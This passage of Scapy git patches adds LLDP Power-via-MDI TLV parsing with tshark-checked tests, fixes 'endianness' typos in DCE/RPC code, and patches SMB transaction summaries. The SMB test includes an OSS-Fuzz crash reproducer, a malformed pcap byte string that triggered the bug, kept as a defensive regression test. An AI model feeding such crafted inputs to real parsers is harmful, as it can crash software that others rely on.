def do_build(self): + backup_ppi = self.power_price_index + self.power_price_index = 0xffff if self.power_price_index == 0xffff \ + else LLDPDUPowerViaMDIMeasure._encode_ppi(self.power_price_index) + s = super(LLDPDUPowerViaMDIMeasure, self).do_build() + self.power_price_index = backup_ppi + return s + + def post_dissect(self, s): + s = super(LLDPDUPowerViaMDIMeasure, self).post_dissect(s) + self.power_price_index = 0xffff if self.power_price_index == 0xffff \ + else LLDPDUPowerViaMDIMeasure._decode_ppi(self.power_price_index) + return s + + @staticmethod + def _match_organization_specific(payload): + ''' + match organization specific TLV + ''' + return (orb(payload[5]) == 8 and orb(payload[1]) == 26 + and bytes_int(payload[2:5]) == + LLDPDUGenericOrganisationSpecific.ORG_UNIQUE_CODE_IEEE_802_3) + + def _check(self): + """ + run layer specific checks + """ + if conf.contribs['LLDP'].strict_mode() and self._length != 26: + raise LLDPInvalidLengthField('length must be 26 - got ' + '{}'.format(self._length)) + # IEEE802.3bt-2018 - sec. 79.3.8 + for field, description, max_value in [('voltage_uncertainty', + 'voltage uncertainty', + 65), + ('voltage_measurement', + 'voltage measurement', + 65), + ('current_uncertainty', + 'current uncertainty', + 6.5), + ('current_measurement', + 'current measurement', + 6.5), + ('energy_uncertainty', + 'energy uncertainty', + 6500000), + ('power_uncertainty', + 'power uncertainty', + 650), + ('power_measurement', + 'power measurement', + 650)]: + val = getattr(self, field) or 0 + if (conf.contribs['LLDP'].strict_mode() and val > max_value): + raise LLDPInvalidFieldValue( + 'exceeded maximum {} of {} - got ' + '{}'.format(description, max_value, val)) + val = self.power_price_index or 0xffff + if val > 65000 and val != 0xffff: + raise LLDPInvalidFieldValue( + 'exceeded maximum power price index of {} - got ' + '{}'.format(LLDPDUPowerViaMDIMeasure._decode_ppi(65000), + LLDPDUPowerViaMDIMeasure._decode_ppi(val))) + # 0x09 .. 0x7e is reserved for future standardization and for now treated as Raw() data # noqa: E501 LLDPDU_CLASS_TYPES = { @@ -710,7 +1233,13 @@ class LLDPDUGenericOrganisationSpecific(LLDPDU): 0x06: LLDPDUSystemDescription, 0x07: LLDPDUSystemCapabilities, 0x08: LLDPDUManagementAddress, - 127: LLDPDUGenericOrganisationSpecific + 127: [ + LLDPDUPowerViaMDI, + LLDPDUPowerViaMDIDDL, + LLDPDUPowerViaMDIType34, + LLDPDUPowerViaMDIMeasure, + LLDPDUGenericOrganisationSpecific, + ] } diff --git a/test/contrib/lldp.uts b/test/contrib/lldp.uts index 3310d5ca11d..6ae5a0f4bbb 100644 --- a/test/contrib/lldp.uts +++ b/test/contrib/lldp.uts @@ -370,3 +370,489 @@ try: frm = frm.build() except: assert False + +~ tshark + += Define check_tshark function + +def check_tshark(pkt, frame_type, selector): + import tempfile, os + fd, pcapfilename = tempfile.mkstemp() + wrpcap(pcapfilename, pkt) + rv = tcpdump(pcapfilename, prog=conf.prog.tshark, getfd=True, + args=['-Y', frame_type, '-T', 'fields', '-e', selector], dump=True, wait=True) + os.close(fd) + os.unlink(pcapfilename) + return rv.decode("utf8").strip() + += Power via MDI tests + +frm = Ether(src='01:01:01:01:01:01', dst=LLDP_NEAREST_BRIDGE_MAC)/\ + LLDPDUChassisID(subtype=LLDPDUChassisID.SUBTYPE_MAC_ADDRESS, id=b'\x06\x05\x04\x03\x02\x01')/\ + LLDPDUPortID(subtype=LLDPDUPortID.SUBTYPE_MAC_ADDRESS, id=b'\x01\x02\x03\x04\x05\x06')/\ + LLDPDUTimeToLive()/\ + LLDPDUGenericOrganisationSpecific(org_code=LLDPDUGenericOrganisationSpecific.ORG_UNIQUE_CODE_PNO, + subtype=0x42, + data=b'FooBar'*5 + )/\ + LLDPDUPowerViaMDI(MDI_power_support='PSE MDI power enabled+PSE MDI power supported', + PSE_power_pair='alt B', + power_class='class 3')/\ + LLDPDUEndOfLLDPDU() + +frm = frm.build() +frm = Ether(frm) +poe_layer = frm[LLDPDUPowerViaMDI] +# Legacy PoE TLV is not supported by WireShark +assert poe_layer +assert poe_layer._type == 127 +assert int(check_tshark(frm, "lldp", "lldp.tlv.type").split(',')[-2], 0) == 127 +assert poe_layer.org_code == LLDPDUGenericOrganisationSpecific.ORG_UNIQUE_CODE_IEEE_802_3 +assert int(check_tshark(frm, "lldp", "lldp.orgtlv.oui").split(',')[-1], 0) == 4623 +assert poe_layer.subtype == 2 +assert int(check_tshark(frm, "lldp", "lldp.ieee.802_3.subtype"), 0) == 0x02 +assert poe_layer._length == 7 +assert int(check_tshark(frm, "lldp", "lldp.tlv.len").split(',')[-2], 0) == 7 +assert poe_layer.MDI_power_support == 6 +assert int(check_tshark(frm, "lldp", "lldp.ieee.802_3.mdi_power_support"), 0) == 6 +assert poe_layer.PSE_power_pair == 2 +assert int(check_tshark(frm, "lldp", "lldp.ieee.802_3.mdi_pse_pair"), 0) == 2 +assert poe_layer.power_class == 4 +assert int(check_tshark(frm, "lldp", "lldp.ieee.802_3.mdi_power_class"), 0) == 4 + + +frm = Ether(src='01:01:01:01:01:01', dst=LLDP_NEAREST_BRIDGE_MAC)/\ + LLDPDUChassisID(subtype=LLDPDUChassisID.SUBTYPE_MAC_ADDRESS, id=b'\x06\x05\x04\x03\x02\x01')/\ + LLDPDUPortID(subtype=LLDPDUPortID.SUBTYPE_MAC_ADDRESS, id=b'\x01\x02\x03\x04\x05\x06')/\ + LLDPDUTimeToLive()/\ + LLDPDUGenericOrganisationSpecific(org_code=LLDPDUGenericOrganisationSpecific.ORG_UNIQUE_CODE_PNO, + subtype=0x42, + data=b'FooBar'*5 + ) +# invalid length +try: + Ether((frm/ + LLDPDUPowerViaMDI(_length=8)/ + LLDPDUEndOfLLDPDU()).build()) + assert False +except LLDPInvalidLengthField: + pass + += Power via MDI with DDL classification extension tests + +frm = Ether(src='01:01:01:01:01:01', dst=LLDP_NEAREST_BRIDGE_MAC)/\ + LLDPDUChassisID(subtype=LLDPDUChassisID.SUBTYPE_MAC_ADDRESS, id=b'\x06\x05\x04\x03\x02\x01')/\ + LLDPDUPortID(subtype=LLDPDUPortID.SUBTYPE_MAC_ADDRESS, id=b'\x01\x02\x03\x04\x05\x06')/\ + LLDPDUTimeToLive()/\ + LLDPDUGenericOrganisationSpecific(org_code=LLDPDUGenericOrganisationSpecific.ORG_UNIQUE_CODE_PNO, + subtype=0x42, + data=b'FooBar'*5 + )/\ + LLDPDUPowerViaMDIDDL(MDI_power_support='PSE pairs controlled+PSE MDI power enabled', + PSE_power_pair='alt A', + power_class='class 4 and above', + power_type_no='type 2', + power_type_dir='PSE', + power_source='backup source', + power_prio='high', + PD_requested_power=2.21111, + PSE_allocated_power=1.521212121)/\ + LLDPDUEndOfLLDPDU() + +frm = frm.build() +frm = Ether(frm) +poe_layer = frm[LLDPDUPowerViaMDIDDL] +assert poe_layer +assert poe_layer._type == 127 +assert int(check_tshark(frm, "lldp", "lldp.tlv.type").split(',')[-2], 0) == 127 +assert poe_layer.org_code == LLDPDUGenericOrganisationSpecific.ORG_UNIQUE_CODE_IEEE_802_3 +assert int(check_tshark(frm, "lldp", "lldp.orgtlv.oui").split(',')[-1], 0) == 4623 +assert poe_layer.subtype == 2 +assert int(check_tshark(frm, "lldp", "lldp.ieee.802_3.subtype"), 0) == 0x02 +assert poe_layer._length == 12 +assert int(check_tshark(frm, "lldp", "lldp.tlv.len").split(',')[-2], 0) == 12 +assert poe_layer.MDI_power_support == 12 +assert int(check_tshark(frm, "lldp", "lldp.ieee.802_3.mdi_power_support"), 0) == 12 +assert poe_layer.PSE_power_pair == 1 +assert int(check_tshark(frm, "lldp", "lldp.ieee.802_3.mdi_pse_pair"), 0) == 1 +# NOTE: wireshark mixes power_prio and PD_4PID fields. Result will be incerrect if PD_4PID==1 +assert poe_layer.power_class == 5 +assert int(check_tshark(frm, "lldp", "lldp.ieee.802_3.mdi_power_class"), 0) == 5 +assert poe_layer.power_type_no == 0 +assert poe_layer.power_type_dir == 0 +assert int(check_tshark(frm, "lldp", "lldp.ieee.802_3.mdi_power_type"), 0) == 0 +assert poe_layer.power_source == 0b10 +assert int(check_tshark(frm, "lldp", "lldp.ieee.802_3.mdi_power_source"), 0) == 0b10 +assert poe_layer.power_prio == 0b10 +assert int(check_tshark(frm, "lldp", "lldp.ieee.802_3.mdi_power_priority"), 0) == 0b10 +assert poe_layer.PD_requested_power == 2.2 +assert int(check_tshark(frm, "lldp", "lldp.ieee.802_3.mdi_pde_requested"), 0) == 22 +assert poe_layer.PSE_allocated_power == 1.5 +assert int(check_tshark(frm, "lldp", "lldp.ieee.802_3.mdi_pse_allocated"), 0) == 15 + + +frm = Ether(src='01:01:01:01:01:01', dst=LLDP_NEAREST_BRIDGE_MAC)/\ + LLDPDUChassisID(subtype=LLDPDUChassisID.SUBTYPE_MAC_ADDRESS, id=b'\x06\x05\x04\x03\x02\x01')/\ + LLDPDUPortID(subtype=LLDPDUPortID.SUBTYPE_MAC_ADDRESS, id=b'\x01\x02\x03\x04\x05\x06')/\ + LLDPDUTimeToLive()/\ + LLDPDUGenericOrganisationSpecific(org_code=LLDPDUGenericOrganisationSpecific.ORG_UNIQUE_CODE_PNO, + subtype=0x42, + data=b'FooBar'*5 + ) +# invalid length +try: + Ether((frm/ + LLDPDUPowerViaMDIDDL(_length=8)/ + LLDPDUEndOfLLDPDU()).build()) + assert False +except LLDPInvalidLengthField: + pass + +# invalid power +try: + Ether((frm/ + LLDPDUPowerViaMDIDDL(PD_requested_power=100)/ + LLDPDUEndOfLLDPDU()).build()) + assert False +except LLDPInvalidFieldValue: + pass + +try: + Ether((frm/ + LLDPDUPowerViaMDIDDL(PSE_allocated_power=100)/ + LLDPDUEndOfLLDPDU()).build()) + assert False +except LLDPInvalidFieldValue: + pass + += Power via MDI with DDL classification and Type 3 and 4 extensions tests + +frm = Ether(src='01:01:01:01:01:01', dst=LLDP_NEAREST_BRIDGE_MAC)/\ + LLDPDUChassisID(subtype=LLDPDUChassisID.SUBTYPE_MAC_ADDRESS, id=b'\x06\x05\x04\x03\x02\x01')/\ + LLDPDUPortID(subtype=LLDPDUPortID.SUBTYPE_MAC_ADDRESS, id=b'\x01\x02\x03\x04\x05\x06')/\ + LLDPDUTimeToLive()/\ + LLDPDUGenericOrganisationSpecific(org_code=LLDPDUGenericOrganisationSpecific.ORG_UNIQUE_CODE_PNO, + subtype=0x42, + data=b'FooBar'*5 + )/\ + LLDPDUPowerViaMDIType34(MDI_power_support='port class PSE+PSE pairs controlled+PSE MDI power enabled', + PSE_power_pair='alt B', + power_class='class 2', + power_type_no='type 1', + power_type_dir='PD', + power_source='PSE and local', + PD_4PID='not supported', + power_prio='low', + PD_requested_power=12.21111, + PSE_allocated_power=11.521212121, + PD_requested_power_mode_A=2.3, + PD_requested_power_mode_B=3.3, + PD_allocated_power_alt_A=3.1, + PD_allocated_power_alt_B=0.5, + PSE_powering_status='4-pair powering single-signature PD', + PD_powered_status='powered single-signature PD', + PD_power_pair_ext='both alts', + dual_signature_class_mode_A='class 4', + dual_signature_class_mode_B='class 2', + power_class_ext='dual-signature pd', + power_type_ext='type 4 single-signature PD', + PD_load='dual-signature and electrically isolated', + PSE_max_available_power=33.333, + autoclass='autoclass completed+autoclass request', + power_down_req='power down', + power_down_time=123)/\ + LLDPDUEndOfLLDPDU() + +frm = frm.build() +frm = Ether(frm) +poe_layer = frm[LLDPDUPowerViaMDIType34] +assert poe_layer +assert poe_layer._type == 127 +assert int(check_tshark(frm, "lldp", "lldp.tlv.type").split(',')[-2], 0) == 127 +assert poe_layer.org_code == LLDPDUGenericOrganisationSpecific.ORG_UNIQUE_CODE_IEEE_802_3 +assert int(check_tshark(frm, "lldp", "lldp.orgtlv.oui").split(',')[-1], 0) == 4623 +assert poe_layer.subtype == 2 +assert int(check_tshark(frm, "lldp", "lldp.ieee.802_3.subtype"), 0) == 0x02 +assert poe_layer._length == 29 +assert int(check_tshark(frm, "lldp", "lldp.tlv.len").split(',')[-2], 0) == 29 +assert poe_layer.MDI_power_support == 13 +assert int(check_tshark(frm, "lldp", "lldp.ieee.802_3.mdi_power_support"), 0) == 13 +assert poe_layer.PSE_power_pair == 2 +assert int(check_tshark(frm, "lldp", "lldp.ieee.802_3.mdi_pse_pair"), 0) == 2 +# NOTE: wireshark mixes power_prio and PD_4PID fields. Result will be incerrect if PD_4PID==1 +assert poe_layer.PD_4PID == 0 +assert poe_layer.power_class == 3 +assert int(check_tshark(frm, "lldp", "lldp.ieee.802_3.mdi_power_class"), 0) == 3 +assert poe_layer.power_type_no == 1 +assert poe_layer.power_type_dir == 1 +assert int(check_tshark(frm, "lldp", "lldp.ieee.802_3.mdi_power_type"), 0) == 3 +assert poe_layer.power_source == 0b11 +assert int(check_tshark(frm, "lldp", "lldp.ieee.802_3.mdi_power_source"), 0) == 0b11 +assert poe_layer.power_prio == 0b11 +assert int(check_tshark(frm, "lldp", "lldp.ieee.802_3.mdi_power_priority"), 0) == 0b11 +assert poe_layer.PD_requested_power == 12.2 +assert int(check_tshark(frm, "lldp", "lldp.ieee.802_3.mdi_pde_requested"), 0) == 122 +assert poe_layer.PSE_allocated_power == 11.5 +assert int(check_tshark(frm, "lldp", "lldp.ieee.802_3.mdi_pse_allocated"), 0) == 115 +assert poe_layer.PD_requested_power_mode_A == 2.3 +assert int(check_tshark(frm, "lldp", "lldp.ieee.802_3.bt_ds_pd_requested_power_value_mode_a"), 0) == 23 +assert poe_layer.PD_requested_power_mode_B == 3.3 +assert int(check_tshark(frm, "lldp", "lldp.ieee.802_3.bt_ds_pd_requested_power_value_mode_b"), 0) == 33 +assert poe_layer.PD_allocated_power_alt_A == 3.1 +assert int(check_tshark(frm, "lldp", "lldp.ieee.802_3.bt_ds_pse_allocated_power_value_alt_a"), 0) == 31 +assert poe_layer.PD_allocated_power_alt_B == 0.5 +assert int(check_tshark(frm, "lldp", "lldp.ieee.802_3.bt_ds_pse_allocated_power_value_alt_b"), 0) == 5 +assert poe_layer.PSE_powering_status == 2 +assert int(check_tshark(frm, "lldp", "lldp.ieee.802_3.bt_pse_powering_status"), 0) == 2 +assert poe_layer.PD_powered_status == 1 +assert int(check_tshark(frm, "lldp", "lldp.ieee.802_3.bt_pd_powered_status"), 0) == 1 +assert poe_layer.PD_power_pair_ext == 3 +assert int(check_tshark(frm, "lldp", "lldp.ieee.802_3.bt_pse_power_pairs_ext"), 0) == 3 +assert poe_layer.dual_signature_class_mode_A == 4 +assert int(check_tshark(frm, "lldp", "lldp.ieee.802_3.bt_ds_pwr_class_ext_a"), 0) == 4 +assert poe_layer.dual_signature_class_mode_B == 2 +assert int(check_tshark(frm, "lldp", "lldp.ieee.802_3.bt_ds_pwr_class_ext_b"), 0) == 2 +assert poe_layer.power_class_ext == 15 +assert int(check_tshark(frm, "lldp", "lldp.ieee.802_3.bt_pwr_class_ext_"), 0) == 15 +assert poe_layer.power_type_ext == 4 +assert int(check_tshark(frm, "lldp", "lldp.ieee.802_3.bt_power_type_ext"), 0) == 4 +assert poe_layer.PD_load == 1 +assert poe_layer.PSE_max_available_power == 33.3 +assert int(check_tshark(frm, "lldp", "lldp.ieee.802_3.bt_pse_maximum_available_power_value"), 0) == 333 +assert poe_layer.autoclass == 3 +assert int(check_tshark(frm, "lldp", "lldp.ieee.802_3.bt_autoclass"), 0) == 3 +assert poe_layer.power_down_req == 0x1d +assert int(check_tshark(frm, "lldp", "lldp.ieee.802_3.bt_power_down_request"), 0) == 0x1d +assert poe_layer.power_down_time == 123 +assert int(check_tshark(frm, "lldp", "lldp.ieee.802_3.bt_power_down_time"), 0) == 123 + + +frm = Ether(src='01:01:01:01:01:01', dst=LLDP_NEAREST_BRIDGE_MAC)/\ + LLDPDUChassisID(subtype=LLDPDUChassisID.SUBTYPE_MAC_ADDRESS, id=b'\x06\x05\x04\x03\x02\x01')/\ + LLDPDUPortID(subtype=LLDPDUPortID.SUBTYPE_MAC_ADDRESS, id=b'\x01\x02\x03\x04\x05\x06')/\ + LLDPDUTimeToLive()/\ + LLDPDUGenericOrganisationSpecific(org_code=LLDPDUGenericOrganisationSpecific.ORG_UNIQUE_CODE_PNO, + subtype=0x42, + data=b'FooBar'*5 + ) +# invalid length +try: + Ether((frm/ + LLDPDUPowerViaMDIType34(_length=8)/ + LLDPDUEndOfLLDPDU()).build()) + assert False +except LLDPInvalidLengthField: + pass + +# invalid power +try: + Ether((frm/ + LLDPDUPowerViaMDIType34(PD_requested_power=100)/ + LLDPDUEndOfLLDPDU()).build()) + assert False +except LLDPInvalidFieldValue: + pass + +try: + Ether((frm/ + LLDPDUPowerViaMDIType34(PSE_allocated_power=100)/ + LLDPDUEndOfLLDPDU()).build()) + assert False +except LLDPInvalidFieldValue: + pass + +try: + Ether((frm/ + LLDPDUPowerViaMDIType34(PD_requested_power_mode_A=50)/ + LLDPDUEndOfLLDPDU()).build()) + assert False +except LLDPInvalidFieldValue: + pass + +try: + Ether((frm/ + LLDPDUPowerViaMDIType34(PD_requested_power_mode_B=50)/ + LLDPDUEndOfLLDPDU()).build()) + assert False +except LLDPInvalidFieldValue: + pass + +try: + Ether((frm/ + LLDPDUPowerViaMDIType34(PD_allocated_power_alt_A=50)/ + LLDPDUEndOfLLDPDU()).build()) + assert False +except LLDPInvalidFieldValue: + pass + +try: + Ether((frm/ + LLDPDUPowerViaMDIType34(PD_allocated_power_alt_B=50)/ + LLDPDUEndOfLLDPDU()).build()) + assert False +except LLDPInvalidFieldValue: + pass + +try: + Ether((frm/ + LLDPDUPowerViaMDIType34(PSE_max_available_power=100)/ + LLDPDUEndOfLLDPDU()).build()) + assert False +except LLDPInvalidFieldValue: + pass + +# invalid time +try: + Ether((frm/ + LLDPDUPowerViaMDIType34(power_down_time=(1<<18))/ + LLDPDUEndOfLLDPDU()).build()) + assert False +except LLDPInvalidFieldValue: + pass + += Power via MDI measurements tests + +import struct + +frm = Ether(src='01:01:01:01:01:01', dst=LLDP_NEAREST_BRIDGE_MAC)/\ + LLDPDUChassisID(subtype=LLDPDUChassisID.SUBTYPE_MAC_ADDRESS, id=b'\x06\x05\x04\x03\x02\x01')/\ + LLDPDUPortID(subtype=LLDPDUPortID.SUBTYPE_MAC_ADDRESS, id=b'\x01\x02\x03\x04\x05\x06')/\ + LLDPDUTimeToLive()/\ + LLDPDUGenericOrganisationSpecific(org_code=LLDPDUGenericOrganisationSpecific.ORG_UNIQUE_CODE_PNO, + subtype=0x42, + data=b'FooBar'*5 + )/\ + LLDPDUPowerViaMDIMeasure(support='power+current', + source='mode B', + request='energy+voltage+current', + valid='power', + voltage_uncertainty=52.25, + current_uncertainty=3.211, + power_uncertainty=140, + energy_uncertainty=2600, + voltage_measurement=22.123, + current_measurement=3.2121, + power_measurement=123.12, + energy_measurement=21123400, + power_price_index='not available')/\ + LLDPDUEndOfLLDPDU() + +frm = frm.build() +frm = Ether(frm) +poe_layer = frm[LLDPDUPowerViaMDIMeasure] +poe_layer_raw = raw(poe_layer) + +# PoE measure TLV is not supported by WireShark + +assert poe_layer +assert poe_layer._type == 127 +assert poe_layer.org_code == LLDPDUGenericOrganisationSpecific.ORG_UNIQUE_CODE_IEEE_802_3 +assert poe_layer.subtype == 8 +assert poe_layer._length == 26 +assert poe_layer.support == 0b0110 +assert poe_layer.source == 0b10 +assert poe_layer.request == 0b1101 +assert poe_layer.valid == 0b0010 +assert poe_layer.voltage_uncertainty == 52.25 +assert struct.unpack(">H", poe_layer_raw[8:10])[0] == 52250 +assert poe_layer.current_uncertainty == 3.211 +assert struct.unpack(">H", poe_layer_raw[10:12])[0] == 32110 +assert poe_layer.power_uncertainty == 140 +assert struct.unpack(">H", poe_layer_raw[12:14])[0] == 14000 +assert poe_layer.energy_uncertainty == 2600 +assert struct.unpack(">H", poe_layer_raw[14:16])[0] == 26 +assert poe_layer.voltage_measurement == 22.123 +assert struct.unpack(">H", poe_layer_raw[16:18])[0] == 22123 +assert poe_layer.current_measurement == 3.2121 +assert struct.unpack(">H", poe_layer_raw[18:20])[0] == 32121 +assert poe_layer.power_measurement == 123.12 +assert struct.unpack(">H", poe_layer_raw[20:22])[0] == 12312 +assert poe_layer.energy_measurement == 21123400 +assert struct.unpack(">I", poe_layer_raw[22:26])[0] == 211234 +assert poe_layer.power_price_index == 0xffff + +frm = Ether(src='01:01:01:01:01:01', dst=LLDP_NEAREST_BRIDGE_MAC)/\ + LLDPDUChassisID(subtype=LLDPDUChassisID.SUBTYPE_MAC_ADDRESS, id=b'\x06\x05\x04\x03\x02\x01')/\ + LLDPDUPortID(subtype=LLDPDUPortID.SUBTYPE_MAC_ADDRESS, id=b'\x01\x02\x03\x04\x05\x06')/\ + LLDPDUTimeToLive()/\ + LLDPDUGenericOrganisationSpecific(org_code=LLDPDUGenericOrganisationSpecific.ORG_UNIQUE_CODE_PNO, + subtype=0x42, + data=b'FooBar'*5 + ) +# invalid length +try: + Ether((frm/ + LLDPDUPowerViaMDIMeasure(_length=8)/ + LLDPDUEndOfLLDPDU()).build()) + assert False +except LLDPInvalidLengthField: + pass + +# invalid voltage +try: + Ether((frm/ + LLDPDUPowerViaMDIMeasure(voltage_uncertainty=500)/ + LLDPDUEndOfLLDPDU()).build()) + assert False +except LLDPInvalidFieldValue: + pass + +try: + Ether((frm/ + LLDPDUPowerViaMDIMeasure(voltage_measurement=500)/ + LLDPDUEndOfLLDPDU()).build()) + assert False +except LLDPInvalidFieldValue: + pass + +# invalid current +try: + Ether((frm/ + LLDPDUPowerViaMDIMeasure(current_uncertainty=500)/ + LLDPDUEndOfLLDPDU()).build()) + assert False +except LLDPInvalidFieldValue: + pass + +try: + Ether((frm/ + LLDPDUPowerViaMDIMeasure(current_measurement=500)/ + LLDPDUEndOfLLDPDU()).build()) + assert False +except LLDPInvalidFieldValue: + pass + +# invalid energy +try: + Ether((frm/ + LLDPDUPowerViaMDIMeasure(energy_uncertainty=66000000)/ + LLDPDUEndOfLLDPDU()).build()) + assert False +except LLDPInvalidFieldValue: + pass + +# invalid power +try: + Ether((frm/ + LLDPDUPowerViaMDIMeasure(power_uncertainty=5000)/ + LLDPDUEndOfLLDPDU()).build()) + assert False +except LLDPInvalidFieldValue: + pass + +try: + Ether((frm/ + LLDPDUPowerViaMDIMeasure(power_measurement=5000)/ + LLDPDUEndOfLLDPDU()).build()) + assert False +except LLDPInvalidFieldValue: + pass + +# invalid power price index +try: + Ether((frm/ + LLDPDUPowerViaMDIMeasure(power_price_index=150)/ + LLDPDUEndOfLLDPDU()).build()) + assert False +except LLDPInvalidFieldValue: + pass From ea7cdaf6fdea33d833583d25646788dcf023d225 Mon Sep 17 00:00:00 2001 From: RoboSchmied Date: Sat, 22 Jun 2024 17:01:52 +0200 Subject: [PATCH 1307/1632] Fix: 15 typos (#4331) Signed-off-by: RoboSchmied --- scapy/contrib/pnio_rpc.py | 14 +++++++------- scapy/contrib/rtps/common_types.py | 2 +- scapy/layers/dcerpc.py | 14 +++++++------- 3 files changed, 15 insertions(+), 15 deletions(-) diff --git a/scapy/contrib/pnio_rpc.py b/scapy/contrib/pnio_rpc.py index 1a5c97688de..cd9b4de4ad4 100644 --- a/scapy/contrib/pnio_rpc.py +++ b/scapy/contrib/pnio_rpc.py @@ -1449,7 +1449,7 @@ def _guess_block_class(_pkt, *args, **kargs): return cls(_pkt, *args, **kargs) -def dce_rpc_endianess(pkt): +def dce_rpc_endianness(pkt): """determine the symbol for the endianness of a the DCE/RPC""" try: endianness = pkt.underlayer.endian @@ -1471,16 +1471,16 @@ class NDRData(Packet): fields_desc = [ EField( FieldLenField("args_length", None, fmt="I", length_of="blocks"), - endianness_from=dce_rpc_endianess), + endianness_from=dce_rpc_endianness), EField( FieldLenField("max_count", None, fmt="I", length_of="blocks"), - endianness_from=dce_rpc_endianess), + endianness_from=dce_rpc_endianness), EField( IntField("offset", 0), - endianness_from=dce_rpc_endianess), + endianness_from=dce_rpc_endianness), EField( FieldLenField("actual_count", None, fmt="I", length_of="blocks"), - endianness_from=dce_rpc_endianess), + endianness_from=dce_rpc_endianness), PacketListField("blocks", [], _guess_block_class, length_from=lambda p: p.args_length) ] @@ -1494,7 +1494,7 @@ class PNIOServiceReqPDU(Packet): fields_desc = [ EField( FieldLenField("args_max", None, fmt="I", length_of="blocks"), - endianness_from=dce_rpc_endianess), + endianness_from=dce_rpc_endianness), NDRData, ] overload_fields = { @@ -1525,7 +1525,7 @@ class PNIOServiceResPDU(Packet): """PNIO PDU for RPC Response""" fields_desc = [ EField(IntEnumField("status", 0, ["OK"]), - endianness_from=dce_rpc_endianess), + endianness_from=dce_rpc_endianness), NDRData, ] overload_fields = { diff --git a/scapy/contrib/rtps/common_types.py b/scapy/contrib/rtps/common_types.py index 70bc8cc5770..38913eff0b8 100644 --- a/scapy/contrib/rtps/common_types.py +++ b/scapy/contrib/rtps/common_types.py @@ -36,7 +36,7 @@ FORMAT_LE = "<" FORMAT_BE = ">" STR_MAX_LEN = 8192 -DEFAULT_ENDIANESS = FORMAT_LE +DEFAULT_ENDIANNESS = FORMAT_LE def is_le(pkt): diff --git a/scapy/layers/dcerpc.py b/scapy/layers/dcerpc.py index 8878a3ed420..edafae91585 100644 --- a/scapy/layers/dcerpc.py +++ b/scapy/layers/dcerpc.py @@ -182,7 +182,7 @@ class DCERPC_Transport(IntEnum): # TODO: add more.. if people use them? -def _dce_rpc_endianess(pkt): +def _dce_rpc_endianness(pkt): """ Determine the right endianness sign for a given DCE/RPC packet """ @@ -196,7 +196,7 @@ def _dce_rpc_endianess(pkt): class _EField(EField): def __init__(self, fld): - super(_EField, self).__init__(fld, endianness_from=_dce_rpc_endianess) + super(_EField, self).__init__(fld, endianness_from=_dce_rpc_endianness) class DceRpc(Packet): @@ -222,7 +222,7 @@ class _DceRpcPayload(Packet): def endianness(self): if not self.underlayer: return "!" - return _dce_rpc_endianess(self.underlayer) + return _dce_rpc_endianness(self.underlayer) # sect 12.5 @@ -947,7 +947,7 @@ class DceRpc5Context(EPacket): None, DceRpc5TransferSyntax, count_from=lambda pkt: pkt.n_transfer_syn, - endianness_from=_dce_rpc_endianess, + endianness_from=_dce_rpc_endianness, ), ] @@ -997,7 +997,7 @@ class DceRpc5Bind(_DceRpcPayload): "context_elem", [], DceRpc5Context, - endianness_from=_dce_rpc_endianess, + endianness_from=_dce_rpc_endianness, count_from=lambda pkt: pkt.n_context_elem, ), ] @@ -1025,7 +1025,7 @@ class DceRpc5BindAck(_DceRpcPayload): "results", [], DceRpc5Result, - endianness_from=_dce_rpc_endianess, + endianness_from=_dce_rpc_endianness, count_from=lambda pkt: pkt.n_results, ), ] @@ -1057,7 +1057,7 @@ class DceRpc5BindNak(_DceRpcPayload): [], DceRpc5Version, count_from=lambda pkt: pkt.n_protocols, - endianness_from=_dce_rpc_endianess, + endianness_from=_dce_rpc_endianness, ), # [MS-RPCE] sect 2.2.2.9 ConditionalField( From 1e857c9614724a984c7101ba3330568e921036de Mon Sep 17 00:00:00 2001 From: Guillaume Valadon Date: Sun, 16 Jun 2024 22:49:14 +0200 Subject: [PATCH 1308/1632] Check if the Data field exists Co-Authored-By: gpotter2 <10530980+gpotter2@users.noreply.github.com> --- scapy/layers/smb.py | 2 +- test/scapy/layers/smb.uts | 10 ++++++++++ 2 files changed, 11 insertions(+), 1 deletion(-) diff --git a/scapy/layers/smb.py b/scapy/layers/smb.py index 89f19a8c34e..c81451241a2 100644 --- a/scapy/layers/smb.py +++ b/scapy/layers/smb.py @@ -788,7 +788,7 @@ def post_build(self, pkt, pay): ) def mysummary(self): - if self.DataLen: + if getattr(self, "Data", None) is not None: return self.sprintf("Tran %Name% ") + self.Data.mysummary() return self.sprintf("Tran %Name%") diff --git a/test/scapy/layers/smb.uts b/test/scapy/layers/smb.uts index 81d0426883a..6afcd4e9c60 100644 --- a/test/scapy/layers/smb.uts +++ b/test/scapy/layers/smb.uts @@ -203,3 +203,13 @@ assert pkt[SMBMailslot_Write].Data.OpCode == 1 assert pkt[SMBMailslot_Write].Data.ServerName == b"MACBOOKPRO-122A\x00" assert pkt[SMBMailslot_Write].Data.Comment == b"Super's MacBook Pro" assert pkt[SMBMailslot_Write].Data.Signature == 0xAA55 + += OSS-Fuzz Findings + +# SMBTransaction_Request +from io import BytesIO +# Issue 69637 +file = BytesIO(b'M<\xb2\xa1\x02\x00\x04\x00\x00\x00\x02\xff\xa1\x00\x00\x00\xff\xff\x00\x00\x01\x00\x00\x00\r\x82\xe8Y[\xc6P"\xa1\xb2\x00_h\x00\x00\x00\x00\x10\x94\x00\x01\x00\x00\x1d%\xcb(\xce\x08\x00U\xfa\xf7\x8c\x00\x00@\x00?\x11\xa7R\xe0\xa8\x01\xa1d\xb2\xc3\xd4\n_\x00\x8a \x00\x00\x01\x00\x00\x00\x01\xff\x00\x00\x00\x10\x94\x00\x01\x00\x00\x1d%\xcb(\xce\x08\x00U\xfa\xf7\x8c\x00\x00@\x00?\x11\xa7R\xe0\xa8\x01\xa1d\xb2\xc3\xd4\n_\x00\x8a\xb2\x00\xa1a\xffl\xff\xff\xef\x00\xff\x01\x00\x08\xa1\xa1E\xf9\x00\xa1\x00\x00?\x8c\x08?\x11\x00\xc3\x00+\x10M<\x1a\x01\x00\xffSMB%d\x01\x05\x00\x00\x00\x00\x00\x00\x00\xd4\xc3\xb2\xa1\x02\x00\x04\x00\x00\x00\xf7\x8c\x00\x00@\x00?\x11\xa7R\xe0\xa8\x01\xa1d\xb2\xc3\xd4\n_\x00\x8a\xb2\x00\xa1a\xffl\xff\xff\xef\x00\xff\x01\x00\x08\xa1\xa1') + +l = rdpcap(file) +assert l[0][NBTDatagram].summary() == "NBTDatagram / SMB_Header / Tran b''" From 2091f694b898691577fb18bf7588de20eda34acc Mon Sep 17 00:00:00 2001 From: Evgeny Vereshchagin Date: Thu, 27 Jun 2024 